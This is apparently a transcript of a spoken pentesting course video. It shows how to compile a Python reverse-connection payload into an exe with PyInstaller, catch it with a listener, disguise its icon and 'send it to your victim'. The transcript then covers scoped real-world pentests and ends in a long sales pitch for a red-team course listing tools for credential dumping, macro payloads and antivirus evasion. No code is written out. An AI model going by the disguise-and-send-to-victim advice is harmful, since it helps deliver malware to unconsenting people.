Just let me copy it. Let me paste it on my desktop. Now let me refresh it, and here is a py. Simple. I can't able to download this file. Just simple copy it and create one document. Simple. Just name it as a new com. Okay, like compile. Let me paste it here. Save, and let's change the extension to py. Rename. Change the extension to py, or you guys can also save it as a Python. Okay, in my system Python is already there, but in your case what you need to do means just visit this website python.org/downloads Windows, and here you guys can able to see the latest Python 3 release is there. Okay, let me you guys can also see right now in my system maybe Python 2 is there. Let's download the Python 2. Control F. Sorry. Okay, here it is. Just see some latest one. Okay, it's a 2020. Let me download this one, Windows 86 or 64 MSI installer. Okay, simple how you guys can able to download this one. Let me show you. Majority of people will get some environment issue, so to avoid this all stuffs you just need to download the MSI. Okay, this one, where it is, man, this one. Okay, right, let me install this. Just click there and click for install for our users. Next, next. Now go down and check this one. Entire feature will be installed on local hard drive. Okay, select that one. Next, as simple as. Right now I just installed the Python 2. Okay, just remember this thing. And previously in my system Python 3 is there. Still by using the Python 3 also I can able to compile, but let me use a Python 2 as well. Okay, so let me show you that one. If I type here cmd, just wait, it's a little bit slow here. Okay, man, just wait. Simple. Let's click on finish. Just open the cmd here. Just type here python 2, sorry, python. Here you guys can able to see right now I successfully installed the Python 2.7.18. Now just type here pip. If you see any kind of output, that means pip has been successfully installed. Now the things you need to do is simple. Just type here cls first to clear that all stuffs. Now just type here PyInstaller. Sorry, first of all just type pip install PyInstaller. Okay, just type enter. Now it will install the PyInstaller for you. I got some error. Maybe. Let me type here pip2. Okay, no problem. Let me type here Python. Let me update this. Okay, by using this command. Just paste it here. Now it will update it. Okay, I think already in my system PyInstaller is there. Okay, no problem. Simple, just type here pip install, sorry, install PyInstaller. Just type enter. So no problem, in my system it's already there, so that's why it's showing some issues here. Okay, but in your case it will work. Okay, so don't no need to worry here. So simple, just type here PyInstaller. Just type here this one. Okay, first of all let me navigate to see desktop. Then simple, just type here PyInstaller and just type here new com.py dash dash one file. Just type enter. See if it's show any kind of output, that means in my system PyInstaller is there. So that's why it's showing that error. Now here you guys can able to see it successfully created it. Okay, newcom.exe. In which folder? Here, sorry, here you guys can able to see this is our exe file. Just send it to your victim, just change the icon, it's totally depend upon you, and send it to victim. Okay, let's check the it's working or not. Simple. I just listen, I started to listen here. Okay, just let me execute this. Okay, let's go back. See, I got the connection. Okay, let me use the resources one. Okay, hell man, it's not valid. So sorry guys, let me use this resources here. Just type here the same thing, resources, resource, and simple paste it here. Simple, started. If I double click this one, here the session is dead. Okay, I don't know why, but dead. I think due to compilation or something like that. But still, we can able to compile it. I will try to fix these issues. Simple. See, if the PyInstaller is not working, if it's showing this kind of issue to you on your system, at that time what you need to do means just use a different compiler there. Okay. There are a lot of compiler is there, like py2exe is there. Okay, just use that one to compile your Python, this Python file. So this is the thing. If I type here sessions, there is a nothing. I need to restart my system, I think. Okay, this is how you guys can able to compile, and how this is how you guys can able to exploit it. Okay, so this is a thing. I'm gonna try to fix it. First of all, the thing is just practice. Just do it on your own system. If you got any errors, just message me. I'm gonna update the videos there. Okay, right. Thank you. Have a nice day. First of all, congratulations, guys. You just completed Windows penetration testing training by Whitesec Cyber Security Consultancy. How to perform this all steps. Okay, you just learned Windows penetration testing training, right? Now, how to implement this all steps in real world scenarios? See, this is the basic things, but still, how you guys can able to perform the steps there. Okay, let me explain you in a very easy way. See how the things work in real world. Let me explain you. See, first of all, you will get the report. Okay, like this is a nothing but it's a client demands. Okay, what he want, and in that report you will see the IP addresses, passwords, each and everything. Okay, yeah, it's totally depend upon what it is. Okay, like gray box pen testing or black box pen testing or something like that. Okay, just assume that I got a black box pen testing. Simple. In black box pen testing, what will the client will provide you only IP address. Okay, whenever you just enter in one organization, what will happen means sorry guys, just see here, just listen carefully. After visiting to one organization, okay, to perform PT, just take an example of I need to perform PT in Windows systems. Okay, now the things will work like this. Okay, the client will provide you the password of their network. Okay, this is the thing they will provide you, but let me tell you, in there are different penetration testing programs out there. Okay, like there are infra PT is there. Okay, there is a red teaming is there, so there are different stuffs out there. Okay, but sometimes what will happen means client in that report, client will demand you to exploit their Wi-Fi. Okay, to hack their Wi-Fi network. This is a thing they will demand you like that in infrastructure. Okay, not in this all stuffs, okay, but it will happen in infrastructure. But whenever you just assume that your client hired you to perform only Windows penetration testing, okay, at that time it doesn't it won't work like this, okay, like you no need to exploit the Wi-Fi there or something like that, okay. This is a thing. Now mostly this comes under red teaming, okay, the exploiting Wi-Fi networks, each and everything. Now here the thing is, just see, assume that the client hired me to perform Windows penetration testing on their organization. At that time, what he provided me, assume that it's a black box pen testing, he just provided me one IP address, okay. I just connected with my client Wi-Fi network, and you just need to say to your client to whitelist your IP address after connecting to the your client network, okay, Wi-Fi network, the organization Wi-Fi network. You just need to say to your client that to whitelist your IP, because in the internal network also there are firewalls, okay, which will block you, See, now there is a thing, a majority of people will get some kind of confusions here. Like you just covered some techniques to bypass the firewall. What if we apply the techniques there? Simple thing is, see, in that report, the things are there. Assume that the client is saying, yes, you guys can able to perform that stuffs. Then just perform it, okay? This is a thing. Basically, it's totally depend upon that report, okay? The things are there. If assume that there are some things or some points are there, some IP addresses are there, okay. Simple, you just need to target that IP address only, okay. So assume that in that report there is some IP addresses such as 192.168.133, okay, something like that. And there is another IP is there, 192.168.144 or something like that. At that time, you just need to only perform PT on this IP addresses only, okay. Assume that you got different IP after scanning the network, you got different IP. You no need to touch that, okay. Don't touch it, because this is a real world scenarios. Here you just need to be very careful, okay, because the things, whenever if you target different things, the things will become bad there, okay. This is a thing. Just assume that sorry, let me tell you, in that I'm saying about report, right? Okay, in that report you will get some IPs. Simple, target that IPs only, okay. Just first of all, what you need to do in the classes also we learn, after getting on that network, we will, after scanning the router, each and everything, the ranges, we can able to see the connected clients, right? From that connected clients, you just need to check this IP addresses, okay. Then you just need to scan this IP addresses, okay. After scanning that, you guys can able to just scan, nothing but port scanning out there, okay. Like there is another scanning, vulnerability scanning. See, enumeration is very important here, okay. Like by using the scripts, NSS script, you guys can able to perform the enumeration by using Nmap. See, by using Nmap, you guys can able to perform more than 60 to 70% of internal penetration testing there, okay. Yes, this is the thing. There are other tools out sorry guys, other tools out there such as Nessus and Expose out there, okay. By using that also, you guys can able to, but the Nmap is a free one, okay. By using this, you guys can able to perform the PT. And the second thing is, you can also, after assume that you just compromise one network, assume that you got one vulnerability there, okay. By scanning Nmap, by using Nmap, okay, I got that this port is vulnerable to, just let me take that 445 port is vulnerable to eternal blue vulnerability. Simple, I just exploited it. After exploiting that, see, in that report, okay, if there is a thing that to exploit it, then only exploit, if there are if it doesn't mention that to exploit that vulnerability, assume that you just scan the network, okay. After scanning the network, this IP address, you got the you just scan this IP, right? Let me tell you again. You just scan this IP, and you can able to see that it's a vulnerable, okay. Now the thing is sorry guys, in that report, okay, they mention that you guys can also exploit, then only exploit it, okay. Now the second thing is, you will get one IT guy as well from that company. The company will provide you one IT guy. He will if you want, if you have some questions, then you guys can able to ask to him. Okay, this is the thing. And the thing is, as you, let me continue from here. You just exploited the eternal blue vulnerability. From there, the things will begin. Okay, by using the metasploit, just use the suggester. Okay, and scan for the exploits. Okay, the system is vulnerable. The if it's vulnerable to privilege escalation or something like that. In the last class, I just explained you with some examples how you guys can able to perform penetration testing in real world. If you want to learn more, then we just created one training for you. Become a certified red team analyst. Here, you will get a complete bundle. See, let me tell you first of all, the requirements for this training is student must know basic ethical hacking here. Okay. Now the thing is roadmap to become a successful red teamer. Here, first of all, you will learn in this section, in this training, you will learn penetration testing. First, students need to learn penetration testing because penetration testing is a backbone of red teaming. In penetration testing, student will learn common attacks and CTF challenges, and some CTF challenges like black box pen testing, white box pen testing, gray box pen testing, and more. Okay, and here the second is after completing this training, you will learn this one, Wi-Fi penetration testing training for red teamers. In this training, student will learn how to perform Wi-Fi penetration testing using different hardwares such as Raspberry Pi, Wi-Fi Pineapple, Android device, and Node MCU. Wi-Fi penetration testing is one section in MITRE ATT&CK, which comes under initial access. Wi-Fi penetration testing is very important in terms of initial access. Then we will move to red team training, introduction to tools and MITRE attacks. Here, this training is very huge because here we just learn each and every thing about the tools which we are using in red teaming. Okay, like it's a very huge training. It's around 22 hours, I think. Here in this training, student will learn what is red teaming and how to perform it, learning all important techniques which is useful to compromise organization. And then after learning that, this one, see, in this red teaming training only you will learn about basic about this one, Active Directory pen testing. Again, for you guys, I just creating another training only for specific training for Active Directory penetration testing for red teamers. In this training, student will learn how to perform Windows Active Directory pen testing for intruders, that means attackers, to get to what they ultimately want, your data, right? They need a plan in, they need credentials. The Active Directory stores all the credentials here. This is, see, assume that if the attacker compromise the Active Directory, that means he just compromised the whole network, whole organization. Okay, this is the thing. We will learn practically how intruder compromise Active Directory. Okay, like how we can able to hack this one in a simple words. Now the fifth one is, this is a very important training for you all, external and internal red team operation training. In this training, student will learn how to perform internal and external red team operation. Student will get complete idea of red team operations, like how to perform in real world. Basically, by learning this all stuffs, you will become a expert in it. Okay, like after entering in organization, in this section we are covering that. Okay, after entering in one organization, how you guys can able to perform red teaming there. Okay, it's a complete practical training. It's a complete different we are using the same attacks we just covered here, but in a way of how we can able to perform the stuffs in real world. Okay, so it's a complete different it's not that much different concept, but you will sorry guys, you will learn the things, the important things, how you guys can able to perform in real world. Note, let me tell you, penetration testing training and Wi-Fi penetration testing training for red teamers is a bonus trainings. Basically, what we thought means, let's provide this penetration testing training and Wi-Fi penetration testing this training for free for them who just enroll the red team training, this one. If you enroll this training, then you will get this training for free. Okay, so that's why we added this one here. Okay, for red teamers is a bonus trainings. Now complete red team, you guys can able to become from 0 to hero. The original price of this training is $700, but today you guys can able to buy this for $200 only. Here there is a content. Okay, first course content of penetration testing training, duration is 6 hours. Here first of all you will learn booting up Kali Linux, Metasploit framework, about Metasploit, Metasploitable machine footprinting, scanning, exploiting FTP, exploiting RMI. Then we will move to basic Linux commands for pen testers. We will learn some basic commands, okay, like which is useful in penetration testing. Basic Linux penetration testing. Here we will learn backdoor footprinting and scanning, backdoor web server, gaining shell, gaining root access. And here bonus Linux penetration testing. Here you will learn scanning, initial access, upload shell, privilege escalation. This all comes under black box pen testing. Okay, here here also you will learn scanning, password cracking, initial access to privilege escalation. Then here you will learn Linux penetration testing, CTF challenges. Okay, hack the this one. Like we perform this CTF in this one, try hack me labs. Here there it is, lab setup, scanning, user enumeration, brute force attacks, gaining access, shell access, privilege escalation to user, privilege escalation. And here you will learn Linux penetration testing, the same thing. Okay, and there is a Windows penetration testing, how you guys can able to perform the Windows penetration testing by using different tools. Okay, here there is another thing for Windows penetration testing. Okay, and there is a other stuffs like exploiting executable there is a, I think I just added 2 videos on it. Okay, this is the thing. Then you will learn course content of Wi-Fi penetration testing training for red teamers. Duration of this training is 5 hours. Here you will learn hacking Wi-Fi using Kali Linux. You will learn this all stuffs. Okay, setting up Kali Linux requirements, security of Wi-Fi networks, what is manage and monitor mode, practical demo on managed and monitor mode, hacking Wi-Fi networks using automation process, like by using some scripts we can able to hack the Wi-Fi networks within 2 minutes or something like that. Okay, and here there is a how to perform evil twin attack to steal logins. Okay, we are using Flexion, Wi-Fi Fisher, Airgidon or some and we will create our own word list to crack handshakes. See, this is also comes under red teaming and penetration testing. Okay, this is very important stuffs. Okay, this video. Okay, and there is another one in this section. I just covered how you guys can able to fix the errors. In some videos, in some tools there are some errors or there. I just covered how you guys can able to fix that. Okay, now there are Wi-Fi penetration testing using Wi-Fi Pineapple. So here I just added each and everything. It's intermediate level training. What is each and everything? Okay, what is Raspberry Pi? Why we are using Raspberry Pi to hack Wi-Fi? Concept of hacking enterprise network. Here it is, flashing Raspberry Pi in memory card. We will flash our Raspberry Pi and we will set up SSH VNC server in it. Okay, and we will try to hack this one, enterprise network. Okay, sorry, I think this guy, the designer, just added this one. You need to remove that. Okay, just ignore it. Okay, basic penetration testing or okay. Now here is just there is a Wi-Fi penetration testing using Wi-Fi Pineapple. Here you will learn how you guys can able to perform penetration testing using Wi-Fi Pineapple. Okay, and the main thing is how you guys can able to perform Wi-Fi penetration testing using Android hacking by using Android. See, let me tell you, in whole internet, no one covered about this one. Okay, I just covered each and everything, how you guys can able to hack the Wi-Fi network by using your Android device. Okay, we are not using any kind of Linux there, Raspberry there, something. Okay, we are just using our Android device. We are booting our Kali Linux. We are rooting our Android device. Okay, and avoiding Android bricks as well. Okay, you will learn a huge stuffs here. Okay, and then we will move to Node MCU. Node MCU is a let me show you that one as well. The hardware, by using this we can able to jump the Wi-Fi networks. Okay, course content of red team training, introduction to tools and MITRE ATT&CK. Duration of this training is 22 plus hours. Okay, now in this classes we are learning about how we can able to perform how we can able to use the red teaming tools which are useful in red teaming, the tools which are useful in red teaming. We just covered almost 40 tools, 40 plus tools. By using the tools, you guys can able to perform reconnaissance, initial access, you guys can able to perform execution. Let me show you here. To perform a successful red team assessment, you just need to follow the steps here. Okay, so in the steps in reconnaissance, this much methods are there. We just covered important methods here. Okay, such as reconnaissance. In reconnaissance, we just covered showdown, amas, or something like that. Okay, by using different tools, we guys can able to perform the reconnaissance. Like in the penetration testing series also, I just showed you in Windows penetration testing series. After entering in one organization, first of all, we just need to perform scanning there. Scanning also comes under reconnaissance only. Okay, and the thing sorry guys, and the thing is, the see after first of all, whenever you just try to target one system or one company, first of all you need to gather information about that company. Okay, so in this reconnaissance section we just covered almost 4 plus hours, I think, about only about reconnaissance by using 6 different tools. Okay, yes, and resource, this is a resource development. Okay, and it's an initial access. In this let me show you, just see, let's go back here. I just told you. Okay, where it is, Wi-Fi penetration testing is a one section in MITRE ATT&CKs which comes under initial access. See this section, after learning this, you just learn only one section. Okay, after learning Wi-Fi hacking, that means you just only learn one section. Sorry guys, in initial access. Okay, this is a thing here. The training of Wi-Fi hacking is around 5 hours. Just see, it's only one section in where in initial access. This is a very huge training. Okay, I just covered each and everything here. And there is a precisions is there. We just learn in Windows as well what is precisions, each and everything, but we just use the different concepts here to perform precisions. Let me show you. In precisions, we just perform precisions using WMI, registry key, schedule task, harvesting hashed credentials, hidden revert shells, remote execution, revert shells, and enumerating users, deploying precisions. We just covered this topic. I just covered more about this all. It's just a limited topics here. I just covered more topics. Okay, by comparing to this. And here there is execution. In execution, we'll learn deep concept about macros, how you guys can able to embed your payload in template. Okay, like I just via Microsoft Word document, like there is a template, right, such as documents or something like that, how we can able to embed our payload in it. Okay, I just covered each and everything there. And then we just move to privilege escalation. I just covered how you guys can able to perform privilege escalation, Kerberos attacks, cracking hashed credentials, and UACME to exploit a vulnerable server. Always install elevated vulnerability by using you will learn this all stuffs in red teaming. It's a very advanced training. Okay, here you will learn evading, how you guys can able to bypass antiviruses. Okay, bypassing network defense using proxy chain. Okay, and then we will learn credentials access using Mimikatz, Responder, Hashcat, Hydra, C and A, Lasagne, John the Ripper, and discovery by using the sharp hood, blood hood, discovering local sensitive data, sensitive information, airdropping information from how you guys can able to gather the information from Active Directory, like how many users are there in that Active Directory, each and everything. Okay, this is the things I just covered. Okay, and here if you see here in lateral movement, I just covered crack map, exec, monkey, psexec or something. Okay, post c2, empire, these are nothing but these are c2s. Okay, and like empire, each covenant, basically empire is popular here. Okay, and sorry guys, and in exfiltration we will learn how you see by using what is exfiltration. Exfiltration is nothing but you guys are gathering some sensitive data from your target system, like sensitive like assume that in our target system there is a one folder, one document is there with the name of passwords. Okay, with the name of password there is a one document is there. Simple, by using this tools you guys can able to gather such sensitive data, okay, which having some sensitive words there. Okay, like password, users or something like that. Okay, you guys can also scan the whole folder to find the sensitive data in it. Okay, so this is the things we just covered here, and we just covered how you guys can able to assume that you just get the this protected PDF or document, how you guys can able to crack it. Okay, we just covered each and everything there. And then after learning this also, see, you guys can also see the definition here. Okay, just read the definition, and what is defense evasion, what is credential, just read it. And then we will move to Active Directory penetration testing. This is a around 10 plus hours. Okay, here you will learn introduction to Active Directory penetration testing. Just wait guys. Okay, and here the tools and the Active Directory attacks and tools, and this LLMR poisoning attack, SMB relay attacks, domain enumeration and grabbing data, dumping hashes, cracking hashes, pass the hash attack, token impersonation and Kerberoasting attacks, credential dumping, golden and silver ticket attacks. Basically, I just covered this whole around 50% of Active Directory in red teaming only. But as I told you, okay, I just created a different different section only about Active Directory. Right now the companies are hiring for them who know about Active Directory. Okay, Active Directory pen testing, because right now this is a very demanding. Okay, see, let me tell you, I just told you, right, if you compromise the Active Directory, that means you just compromise the entire network, entire organization. Okay, and there content of external and internal red team operation. Duration of this training is 10 plus hours. Complete 10 hours of practical training on how to perform red team operations on real world. Now the student will get complete idea about how to implement all these attacks in real world. Sometimes what will happen, student often enrolling this training, after watching this training, sometimes you will get some confusions there. Okay, by watching this training you won't get any kind of problem there. Okay, like you will get a complete idea that how you guys can able to implement those all attacks in real world. See, in real world the things are easy by comparing to the this training. Okay, this is the thing. See, in training what we are doing, we are covering each and every attack, but in real world you will get the team. Okay, the team will perform the different attack, you will perform the different attack, something like that. So by entering in the section you will learn everything. Okay, like you won't get any kind of issues there. Okay, if you have any kind of confusions, then everything will be solved here. Okay, and the thing is the training price I just told you, right, the training price is $200 only. It's a limited time. Okay, offer. Just click on this button and contact with our support team. See, the tools which I just covered in this training. Okay, I just covered AMAS, Sniper, Harvester, Multigo, and there is a Recon and Showdown, Spiderfoot, to perform reconnaissance. Okay, Nikto is there. I just covered Sherlock and Metasploit, Wi-Fi Pineapple, Raspberry Pi, Fluxion for Wi-Fi penetration testing, AirGidon for Wi-Fi penetration testing, Wi-Fi TE for Wi-Fi penetration testing, AirCrack NG. This is a Node MCU, and this is a Lucky Strike. By I just told you, by Lucky Strike, you guys can able to embed your payloads with Microsoft document. Okay, and we just use a GoFish SQL map, and this one I just for this one Unicorn, Donut, the tools which is useful to perform red teaming, PowerShell. I just forgetted the name here. What he just added? He just simple added the PowerShell. Okay, like yes, okay. It's I think it a invoke obfuscation. I think okay, and here we just used the impact. Okay, impact it and Rubius, and there is a SharpUp is here. The tools which we are using in this training. Okay, this is a invoke obfuscation, and there is a proxy chain, and there is a Hydra, and there is a Lasagna to dump the credentials from our target system. Okay, and we just use the responder here, John the Ripper, to crack the passwords. It comes under credential access. Okay, Hashcat and Mimikatz. I just use a Bloodhood for discovery, I think, and Kismet, AD Recon, and there is a Ghost Packet is here, and there is a Covenant is a nothing but it's a C2, and we just use this Covenant and the Empire as well. Okay, and we just use the power up SQL as well to edit and exploit the SQL service, sorry, Microsoft SQL. Okay, and we just use a PowerSploit here and Clockify CLI and CrackMap EXEC, and I just covered some other tools as well and many more, right? And here this is a must and should prerequisite for the requirements for this training is student must have a knowledge about ethical hacking, must have laptop or PC with 6 or 8 GB of RAM. Okay, graphic card sorry guys, graphic card you can have like 2 or 4 GB. It's totally but RAM is important. Graphic card also important. I don't know why, but he didn't add it here. Okay, just graphic card around, just use a 4 or 2, it's sufficient. Okay, must have internet connection to access training and to download labs. Okay, labs are around 10 GB, I think. Okay, if you have any questions, contact us on WhatsApp. If you want to contact personally to me, then you guys can also contact me on Telegram. Okay, and there is also my email address is there, founder@whitesec.org. Can also email to that. Okay, so this is the thing. If you want to enroll it, we accept both payments for national and international, such as PayPal, Bitcoin, Paytm. Okay, these things, right? Hope you guys enjoy this training. Thank you. Have a nice day. See, after completion of this training, you will get a certificate. Let me show you the sample. So this is a sample of certificate, right?